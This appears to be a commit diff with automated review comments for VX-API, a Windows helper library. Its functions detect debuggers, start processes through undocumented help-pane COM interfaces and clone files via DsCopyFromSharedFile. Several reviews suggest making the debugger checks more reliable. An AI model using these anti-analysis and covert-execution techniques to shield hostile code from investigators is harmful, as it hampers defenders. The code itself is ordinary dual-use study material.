} TEB, * PTEB;
|
|
@ -1,5 +0,0 @@
|
|||
typedef struct _TEB_ACTIVE_FRAME {
|
||||
ULONG Flags;
|
||||
struct _TEB_ACTIVE_FRAME* Previous;
|
||||
PTEB_ACTIVE_FRAME_CONTEXT Context;
|
||||
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
|
|
@ -1,4 +0,0 @@
|
|||
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
|
||||
ULONG Flags;
|
||||
PCHAR FrameName;
|
||||
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
|
|
@ -1,5 +0,0 @@
|
|||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
PWSTR Buffer;
|
||||
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING;
|
|
@ -0,0 +1,31 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 17
|
||||
VisualStudioVersion = 17.3.32811.315
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "VX-API", "VX-API\VX-API.vcxproj", "{12CF8029-1663-470E-B138-39DC69C35B1D}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x64.Build.0 = Debug|x64
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x86.Build.0 = Debug|Win32
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x64.ActiveCfg = Release|x64
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x64.Build.0 = Release|x64
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.ActiveCfg = Release|Win32
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {1F480641-9B52-43C6-8598-B49F6B203C27}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,19 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL AdfCloseHandleOnInvalidAddress(VOID)
|
||||
{
|
||||
__try
|
||||
{
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4312)
|
||||
CloseHandle((HANDLE)0xDEADBEEF);
|
||||
#pragma warning( pop )
|
||||
return FALSE;
|
||||
}
|
||||
__except (EXCEPTION_INVALID_HANDLE == GetExceptionCode() ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
|
||||
{
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
return FALSE;
|
||||
}
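Review bot: The new file carries no comment explaining why `CloseHandle((HANDLE)0xDEADBEEF)` inside `__try` detects a debugger, the explanation and the Checkpoint Research credit having been dropped in the move; restore a short header such as `/* Under a debugger, CloseHandle() on an invalid handle raises EXCEPTION_INVALID_HANDLE (0xC0000008), so reaching __except indicates a debugger is attached. Credit: Checkpoint Research */`. That comment should also record a known false positive: a process with strict handle checking enabled (SetProcessMitigationPolicy with ProcessStrictHandleCheckPolicy) raises the same exception with no debugger attached, so callers should treat TRUE as a hint rather than proof. The `#pragma warning(disable : 4312)` pair exists only to silence the int-to-pointer widening of the literal; `(HANDLE)(ULONG_PTR)0xDEADBEEF` avoids the warning without it. The name `AdfCloseHandleOnInvalidAddress` says address while the check is for an invalid handle.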
|
|
@ -0,0 +1,19 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL AdfIsCreateProcessDebugEventCodeSet(VOID)
|
||||
{
|
||||
WCHAR FilePath[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
if (GetProcessPathFromProcessParametersW((MAX_PATH * sizeof(WCHAR)), FilePath) == 0)
|
||||
return FALSE;
|
||||
|
||||
hHandle = CreateFileW(FilePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
return TRUE;
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return FALSE;
|
||||
}
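Review bot: Every CreateFileW failure is reported as a debugger, because `if (hHandle == INVALID_HANDLE_VALUE) return TRUE;` never inspects the error, and a share-mode-0 open of the running image can also fail with ERROR_ACCESS_DENIED under a restrictive ACL or transiently while a scanner or backup agent holds the file. Narrowing it to `if (hHandle == INVALID_HANDLE_VALUE) return (GetLastError() == ERROR_SHARING_VIOLATION);` keeps the heuristic (a debugger that never closed the handle it received with CREATE_PROCESS_DEBUG_EVENT) while dropping those false positives. That explanation and the Checkpoint Research credit were not carried over into this file and should be restored as a header comment, since the function name alone does not say what is being tested. Minor: `WCHAR FilePath[MAX_PATH * sizeof(WCHAR)]` declares 520 WCHARs, and whether the same `MAX_PATH * sizeof(WCHAR)` handed to GetProcessPathFromProcessParametersW is read there as a byte or a character count is not visible here — the two should be made to agree.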
|
|
@ -1,10 +1,4 @@
|
|||
/*
|
||||
Some debuggers can be detected by using the kernel32!OpenProcess() function on the csrss.exe process.
|
||||
The call will succeed only if the user for the process is a member of the administrators group and
|
||||
has debug privileges.
|
||||
|
||||
Credit: Checkpoint Research
|
||||
*/
|
||||
#include "Win32Helper.h"
|
||||
|
||||
BOOL AdfOpenProcessOnCsrss(VOID)
|
||||
{
|
||||
|
@ -13,11 +7,11 @@ BOOL AdfOpenProcessOnCsrss(VOID)
|
|||
CSRGETPROCESSID CsrGetProcessId = NULL;
|
||||
HANDLE hCsrHandle = NULL;
|
||||
|
||||
hNtdll = RfGetModuleHandleW(L"ntdll.dll");
|
||||
hNtdll = GetModuleHandleExW(L"ntdll.dll");
|
||||
if (hNtdll == NULL)
|
||||
return FALSE;
|
||||
|
||||
CsrGetProcessId = (CSRGETPROCESSID)RfGetProcAddressA((DWORD64)hNtdll, "CsrGetProcessId");
|
||||
CsrGetProcessId = (CSRGETPROCESSID)GetProcAddressA((DWORD64)hNtdll, "CsrGetProcessId");
|
||||
if (CsrGetProcessId == NULL)
|
||||
return FALSE;
|
||||
|
||||
|
@ -29,4 +23,4 @@ BOOL AdfOpenProcessOnCsrss(VOID)
|
|||
CloseHandle(hCsrHandle);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
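Review bot: The new helper name `GetModuleHandleExW` in the second hunk is also a real Win32 export (`GetModuleHandleExW(DWORD, LPCWSTR, HMODULE*)` from libloaderapi.h), yet it is called here with a single argument; any translation unit that sees both declarations will fail to compile on the conflicting prototype or bind the call to the wrong function, so a distinct project name such as `GetModuleHandleEx2W` is the safer choice. `GetProcAddressA` does not have this problem, because the real GetProcAddress has no A/W variants. The first hunk also drops the comment explaining the heuristic and the Checkpoint Research credit; restore it as a short header in the new file, for example `/* OpenProcess() on csrss.exe succeeds only for an administrator holding debug privileges, which some debuggers enable. Credit: Checkpoint Research */`. The OpenProcess call and its result handling lie between the hunks and are not visible here.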
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
PCHAR CaplockStringA(PCHAR Ptr)
|
||||
{
|
||||
PCHAR sv = Ptr;
|
||||
|
@ -22,4 +24,4 @@ PWCHAR CaplockStringW(PWCHAR Ptr)
|
|||
sv++;
|
||||
}
|
||||
return Ptr;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
VOID CharArrayToByteArrayA(PCHAR Char, PBYTE Byte, DWORD Length)
|
||||
{
|
||||
for (DWORD dwX = 0; dwX < Length; dwX++)
|
||||
|
@ -12,4 +14,4 @@ VOID CharArrayToByteArrayW(PWCHAR Char, PBYTE Byte, DWORD Length)
|
|||
{
|
||||
Byte[dwX] = (BYTE)Char[dwX];
|
||||
}
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed)
|
||||
{
|
||||
INT Length = (INT)MaximumAllowed;
|
||||
|
@ -9,4 +11,4 @@ SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumA
|
|||
}
|
||||
|
||||
return MaximumAllowed - Length;
|
||||
}
|
||||
}
|
|
@ -1,10 +1,6 @@
|
|||
/*
|
||||
#include "Win32Helper.h"
|
||||
|
||||
Created via ReactOS and IDA
|
||||
|
||||
Credit: smelly__vx
|
||||
*/
|
||||
BOOL RfCheckRemoteDebuggerPresent(HANDLE hHandle, PBOOL pbDebuggerPresent)
|
||||
BOOL CheckRemoteDebuggerPresentEx(HANDLE hHandle, PBOOL pbDebuggerPresent)
|
||||
{
|
||||
typedef enum _PROCESSINFOCLASS
|
||||
{
|
||||
|
@ -24,11 +20,11 @@ BOOL RfCheckRemoteDebuggerPresent(HANDLE hHandle, PBOOL pbDebuggerPresent)
|
|||
if (hHandle == NULL)
|
||||
return FALSE;
|
||||
|
||||
HMODULE hModule = RfGetModuleHandleW(L"ntdll.dll");
|
||||
HMODULE hModule = GetModuleHandleExW(L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
return FALSE;
|
||||
|
||||
NtQueryInformationProcess = (NTQUERYINFORMATIONPROCESS)RfGetProcAddressW((DWORD64)hModule, L"NtQueryInformationProcess");
|
||||
NtQueryInformationProcess = (NTQUERYINFORMATIONPROCESS)GetProcAddressW((DWORD64)hModule, L"NtQueryInformationProcess");
|
||||
if (!NtQueryInformationProcess)
|
||||
return FALSE;
|
||||
|
||||
|
@ -39,4 +35,4 @@ BOOL RfCheckRemoteDebuggerPresent(HANDLE hHandle, PBOOL pbDebuggerPresent)
|
|||
*pbDebuggerPresent = TRUE;
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
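Review bot: The `Created via ReactOS and IDA / Credit: smelly__vx` header is removed in the first hunk without a replacement, so the new file no longer says that this is a reimplementation of kernel32!CheckRemoteDebuggerPresent built on NtQueryInformationProcess; a one-line `/* Reimplementation of CheckRemoteDebuggerPresent over ntdll!NtQueryInformationProcess, derived from ReactOS and IDA. Credit: smelly__vx */` would keep that context. The same naming clash applies in the second hunk: `GetModuleHandleExW(L"ntdll.dll")` uses the name of a three-argument Win32 export, so a project-specific name (`GetModuleHandleEx2W`) avoids a conflicting declaration wherever windows.h is also included. The body between the hunks is not visible, so whether `pbDebuggerPresent` is NULL-checked before the `*pbDebuggerPresent = TRUE` write in the last hunk cannot be confirmed from here; only the `hHandle == NULL` guard is shown.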
|
|
@ -1,10 +1,12 @@
|
|||
PVOID RfCopyMemory(PVOID Destination, CONST PVOID Source, SIZE_T Length)
|
||||
{
|
||||
PBYTE D = (PBYTE)Destination;
|
||||
PBYTE S = (PBYTE)Source;
|
||||
|
||||
while (Length--)
|
||||
*D++ = *S++;
|
||||
|
||||
return Destination;
|
||||
}
|
||||
#include "StringManipulation.h"
|
||||
|
||||
PVOID CopyMemoryEx(PVOID Destination, CONST PVOID Source, SIZE_T Length)
|
||||
{
|
||||
PBYTE D = (PBYTE)Destination;
|
||||
PBYTE S = (PBYTE)Source;
|
||||
|
||||
while (Length--)
|
||||
*D++ = *S++;
|
||||
|
||||
return Destination;
|
||||
}
|
|
@ -1,9 +1,5 @@
|
|||
/*
|
||||
FileToClone can be a path to any file. The file does not matter, but it must exist
|
||||
NewFileName is the file you want to create. It can named anything and in any dir you have permissions to create a file in
|
||||
#include "Win32Helper.h"
|
||||
|
||||
Credit: Jonas Lyk
|
||||
*/
|
||||
BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
|
||||
{
|
||||
typedef struct __DATA_SHARE_SCOPE_ENTRY {
|
||||
|
@ -25,7 +21,7 @@ BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
|
|||
typedef HRESULT(WINAPI* DSCREATESHAREDFILETOKEN)(LPCWSTR, PDATA_SHARE_CTRL, INT, INT, WCHAR**);
|
||||
typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
|
||||
|
||||
DATA_SHARE_CTRL Share; RfZeroMemory(&Share, sizeof(DATA_SHARE_CTRL));
|
||||
DATA_SHARE_CTRL Share; ZeroMemoryEx(&Share, sizeof(DATA_SHARE_CTRL));
|
||||
LPWSTR SidString = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
DSCREATESHAREDFILETOKEN DsCreateSharedFileToken = NULL;
|
||||
|
@ -39,8 +35,8 @@ BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
|
|||
if (hDsClient == NULL)
|
||||
return FALSE;
|
||||
|
||||
DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)RfGetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
|
||||
DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)RfGetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
|
||||
DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)GetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
|
||||
DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)GetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
|
||||
|
||||
if (!DsCreateSharedFileToken || !DsCopyFromSharedFile)
|
||||
goto EXIT_ROUTINE;
|
||||
|
@ -66,10 +62,10 @@ BOOL CreateFileFromDsCopyFromSharedFileW(PWCHAR NewFileName, PWCHAR FileToClone)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
|
||||
if (SidString)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, SidString);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, SidString);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
@ -98,7 +94,7 @@ BOOL CreateFileFromDsCopyFromSharedFileA(PCHAR NewFileName, PCHAR FileToClone)
|
|||
typedef HRESULT(WINAPI* DSCREATESHAREDFILETOKEN)(LPCWSTR, PDATA_SHARE_CTRL, INT, INT, WCHAR**);
|
||||
typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
|
||||
|
||||
DATA_SHARE_CTRL Share; RfZeroMemory(&Share, sizeof(DATA_SHARE_CTRL));
|
||||
DATA_SHARE_CTRL Share; ZeroMemoryEx(&Share, sizeof(DATA_SHARE_CTRL));
|
||||
LPWSTR SidString = NULL;
|
||||
HANDLE hToken = NULL;
|
||||
DSCREATESHAREDFILETOKEN DsCreateSharedFileToken = NULL;
|
||||
|
@ -121,8 +117,8 @@ BOOL CreateFileFromDsCopyFromSharedFileA(PCHAR NewFileName, PCHAR FileToClone)
|
|||
if (hDsClient == NULL)
|
||||
return FALSE;
|
||||
|
||||
DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)RfGetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
|
||||
DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)RfGetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
|
||||
DsCreateSharedFileToken = (DSCREATESHAREDFILETOKEN)GetProcAddressA((DWORD64)hDsClient, "DSCreateSharedFileToken");
|
||||
DsCopyFromSharedFile = (DSCOPYFROMSHAREDFILE)GetProcAddressA((DWORD64)hDsClient, "DSCopyFromSharedFile");
|
||||
|
||||
if (!DsCreateSharedFileToken || !DsCopyFromSharedFile)
|
||||
goto EXIT_ROUTINE;
|
||||
|
@ -148,13 +144,13 @@ BOOL CreateFileFromDsCopyFromSharedFileA(PCHAR NewFileName, PCHAR FileToClone)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
|
||||
if (SidString)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, SidString);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, SidString);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
}
|
|
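Review bot: The block comment documenting FileToClone (must exist, content irrelevant) and NewFileName (the file to create) is removed on the new side of the first hunk and only `#include "Win32Helper.h"` replaces it, so CreateFileFromDsCopyFromSharedFileW/A lose their only parameter documentation and the Jonas Lyk credit. The same header-comment removal happens in CreateLocalAppDataObjectPath, CreateProcessWithCfGuard, CreateWindowsObjectPath and GetCurrentUserSid in this commit; I would keep each comment below the new include rather than deleting it. In the EXIT_ROUTINE hunks `dwError = GetLastErrorEx();` is assigned but nothing visible before `return bFlag;` reads dwError, so unless it is consumed outside the hunk the captured error code is discarded and the caller only sees FALSE. Both function bodies start and continue outside the hunks shown.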
@ -1,16 +1,11 @@
|
|||
/*
|
||||
#include "Win32Helper.h"
|
||||
|
||||
pBuffer == OUT
|
||||
Path == concatted, must have \\ in front i.e. L"\\File.exe"
|
||||
|
||||
Credit: smelly__vx
|
||||
*/
|
||||
BOOL CreateLocalAppDataObjectPathW(PWCHAR pBuffer, PWCHAR Path, DWORD Size, BOOL bDoesObjectExist)
|
||||
{
|
||||
if (pBuffer == NULL)
|
||||
return FALSE;
|
||||
|
||||
if (RfGetEnvironmentVariableW(L"LOCALAPPDATA", pBuffer, Size) == 0)
|
||||
if (GetEnvironmentVariableW(L"LOCALAPPDATA", pBuffer, Size) == 0)
|
||||
return FALSE;
|
||||
|
||||
if (StringConcatW(pBuffer, Path) == 0)
|
||||
|
@ -30,7 +25,7 @@ BOOL CreateLocalAppDataObjectPathA(PCHAR pBuffer, PCHAR Path, DWORD Size, BOOL b
|
|||
if (pBuffer == NULL)
|
||||
return FALSE;
|
||||
|
||||
if (RfGetEnvironmentVariableA("LOCALAPPDATA", pBuffer, Size) == 0)
|
||||
if (GetEnvironmentVariableA("LOCALAPPDATA", pBuffer, Size) == 0)
|
||||
return FALSE;
|
||||
|
||||
if (StringConcatA(pBuffer, Path) == 0)
|
|
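Review bot: `if (GetEnvironmentVariableW(L"LOCALAPPDATA", pBuffer, Size) == 0)` only catches an absent variable; if this call keeps the Win32 contract, a buffer smaller than the value returns the required length (non-zero) and leaves pBuffer unset, and the following `StringConcatW(pBuffer, Path)` then appends Path to whatever the caller's buffer held, with no bound derived from Size. Suggest `DWORD dwLength = GetEnvironmentVariableW(L"LOCALAPPDATA", pBuffer, Size); if (dwLength == 0 || dwLength >= Size) return FALSE;` followed by a check that `dwLength + StringLengthW(Path) < Size` before the concat, and the same in the A variant. CreateWindowsObjectPathW/A in this commit have the identical unbounded concat after `GetSystemWindowsDirectoryW(Size, pBuffer)`, whose too-small result is also non-zero under the Win32 contract. Both function bodies continue past the hunk.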
@ -0,0 +1,94 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
struct __declspec(uuid("{8cec592c-07a1-11d9-b15e-000d56bfe6ee}"))
|
||||
IHxHelpPaneServer : public IUnknown {
|
||||
virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0;
|
||||
virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0;
|
||||
virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0;
|
||||
virtual HRESULT __stdcall Execute(const PWCHAR) = 0;
|
||||
};
|
||||
|
||||
HRESULT CoInitializeIHxHelpIds(LPGUID Clsid, LPGUID Iid)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58ae-07a1-11d9-b15e-000d56bfe6ee}", Clsid)))
|
||||
return Result;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec592c-07a1-11d9-b15e-000d56bfe6ee}", Iid)))
|
||||
return Result;
|
||||
|
||||
return Result;
|
||||
}
|
||||
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerW(PWCHAR UriFile)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
GUID CLSID_IHxHelpPaneServer;
|
||||
GUID IID_IHxHelpPaneServer;
|
||||
|
||||
IHxHelpPaneServer* Help = NULL;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeIHxHelpIds(&CLSID_IHxHelpPaneServer, &IID_IHxHelpPaneServer)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(CoCreateInstance(CLSID_IHxHelpPaneServer, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (PVOID*)&Help)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
Result = Help->Execute(UriFile);
|
||||
|
||||
if (Help)
|
||||
Help->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return Win32FromHResult(Result);
|
||||
}
|
||||
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerA(PCHAR UriFile)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
GUID CLSID_IHxHelpPaneServer;
|
||||
GUID IID_IHxHelpPaneServer;
|
||||
IHxHelpPaneServer* Help = NULL;
|
||||
PWCHAR wUriFile = NULL;
|
||||
DWORD dwLength = 0;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeIHxHelpIds(&CLSID_IHxHelpPaneServer, &IID_IHxHelpPaneServer)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(CoCreateInstance(CLSID_IHxHelpPaneServer, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (PVOID*)&Help)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
dwLength = (DWORD)StringLengthA(UriFile);
|
||||
if (dwLength == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
wUriFile = (PWCHAR)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwLength);
|
||||
if (wUriFile == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CharStringToWCharString(wUriFile, UriFile, dwLength) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Help->Execute(wUriFile);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (Help)
|
||||
Help->Release();
|
||||
|
||||
if (wUriFile)
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, wUriFile);
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
}
|
|
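Review bot: `wUriFile = (PWCHAR)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwLength);` in CreateProcessFromIHxHelpPaneServerA sizes the allocation in bytes from a CHAR count, but the buffer then receives a wide string via `CharStringToWCharString(wUriFile, UriFile, dwLength)`, which needs `(dwLength + 1) * sizeof(WCHAR)` bytes; unless CharStringToWCharString truncates to its size argument this is a heap overflow, and CreateProcessFromIHxInteractiveUserA repeats it with `dwLength + 1` as the copy length. Suggest `wUriFile = (PWCHAR)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, ((SIZE_T)dwLength + 1) * sizeof(WCHAR));` in both files. Separately, both HelpPaneServer variants do not store the CoCreateInstance result (`if (!SUCCEEDED(CoCreateInstance(...)))`), so the failure path returns `Win32FromHResult(Result)` with Result still holding the CoInitializeEx success value and reports ERROR_SUCCESS while Help is NULL; write it as `Result = CoCreateInstance(...)` as the IHxInteractiveUser file does. That early return (and the matching one in CreateProcessFromIHxInteractiveUserW) also skips CoUninitialize after a successful CoInitializeEx, so the failing path should `goto EXIT_ROUTINE` in the A variants and call CoUninitialize before returning in the W variants.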
@ -0,0 +1,89 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
struct __declspec(uuid("8cec595b-07a1-11d9-b15e-000d56bfe6ee"))
|
||||
IHxInteractiveUser : public IUnknown {
|
||||
virtual VOID __stdcall Execute(PWCHAR pcUrl) = 0;
|
||||
};
|
||||
|
||||
HRESULT CoInitializeIHxInteractiveUserIds(LPGUID Clsid, LPGUID Iid)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58e7-07a1-11d9-b15e-000d56bfe6ee}", Clsid)))
|
||||
return Result;
|
||||
|
||||
if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec595b-07a1-11d9-b15e-000d56bfe6ee}", Iid)))
|
||||
return Result;
|
||||
|
||||
return Result;
|
||||
}
|
||||
|
||||
HRESULT CreateProcessFromIHxInteractiveUserW(PWCHAR UriFile)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
GUID CLSID_IHxInteractiveUser;
|
||||
GUID IID_IHxInteractiveUser;
|
||||
IHxInteractiveUser* User = NULL;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeIHxInteractiveUserIds(&CLSID_IHxInteractiveUser, &IID_IHxInteractiveUser)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoCreateInstance(CLSID_IHxInteractiveUser, NULL, CLSCTX_ALL, IID_IHxInteractiveUser, (PVOID*)&User)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
User->Execute(UriFile);
|
||||
|
||||
if (User)
|
||||
User->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return Win32FromHResult(Result);
|
||||
}
|
||||
|
||||
HRESULT CreateProcessFromIHxInteractiveUserA(PCHAR UriFile)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
GUID CLSID_IHxInteractiveUser;
|
||||
GUID IID_IHxInteractiveUser;
|
||||
IHxInteractiveUser* User = NULL;
|
||||
PWCHAR wUriFile = NULL;
|
||||
DWORD dwLength = 0;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeIHxInteractiveUserIds(&CLSID_IHxInteractiveUser, &IID_IHxInteractiveUser)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
if (!SUCCEEDED(Result = CoCreateInstance(CLSID_IHxInteractiveUser, NULL, CLSCTX_ALL, IID_IHxInteractiveUser, (PVOID*)&User)))
|
||||
return Win32FromHResult(Result);
|
||||
|
||||
dwLength = (DWORD)StringLengthA(UriFile);
|
||||
if (dwLength == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
wUriFile = (PWCHAR)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwLength);
|
||||
if(wUriFile == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CharStringToWCharString(wUriFile, UriFile, dwLength + 1) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
User->Execute(wUriFile);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (User)
|
||||
User->Release();
|
||||
|
||||
if (wUriFile)
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, wUriFile);
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return Win32FromHResult(Result);
|
||||
}
|
|
@ -1,10 +1,4 @@
|
|||
/*
|
||||
must pass pointer of PPROCESS_INFORMATION to function, callee is responsible for closing handles
|
||||
eg
|
||||
|
||||
CloseHandle(PihProcess);
|
||||
CloseHandle(Pi.hThread);
|
||||
*/
|
||||
#include "Win32Helper.h"
|
||||
|
||||
typedef struct _PROC_THREAD_ATTRIBUTE {
|
||||
ULONG64 Attribute;
|
||||
|
@ -28,7 +22,7 @@ BOOL UnusedSubroutineInitializeProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_L
|
|||
|
||||
if (dwFlags || (dwAttributeCount > 0x1B))
|
||||
{
|
||||
SetLastError(ERROR_INVALID_PARAMETER);
|
||||
SetLastErrorEx(ERROR_INVALID_PARAMETER);
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
|
@ -43,7 +37,7 @@ BOOL UnusedSubroutineInitializeProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_L
|
|||
bFlag = TRUE;
|
||||
}
|
||||
else
|
||||
SetLastError(ERROR_INSUFFICIENT_BUFFER);
|
||||
SetLastErrorEx(ERROR_INSUFFICIENT_BUFFER);
|
||||
|
||||
*lpSize = dwSize;
|
||||
return bFlag;
|
||||
|
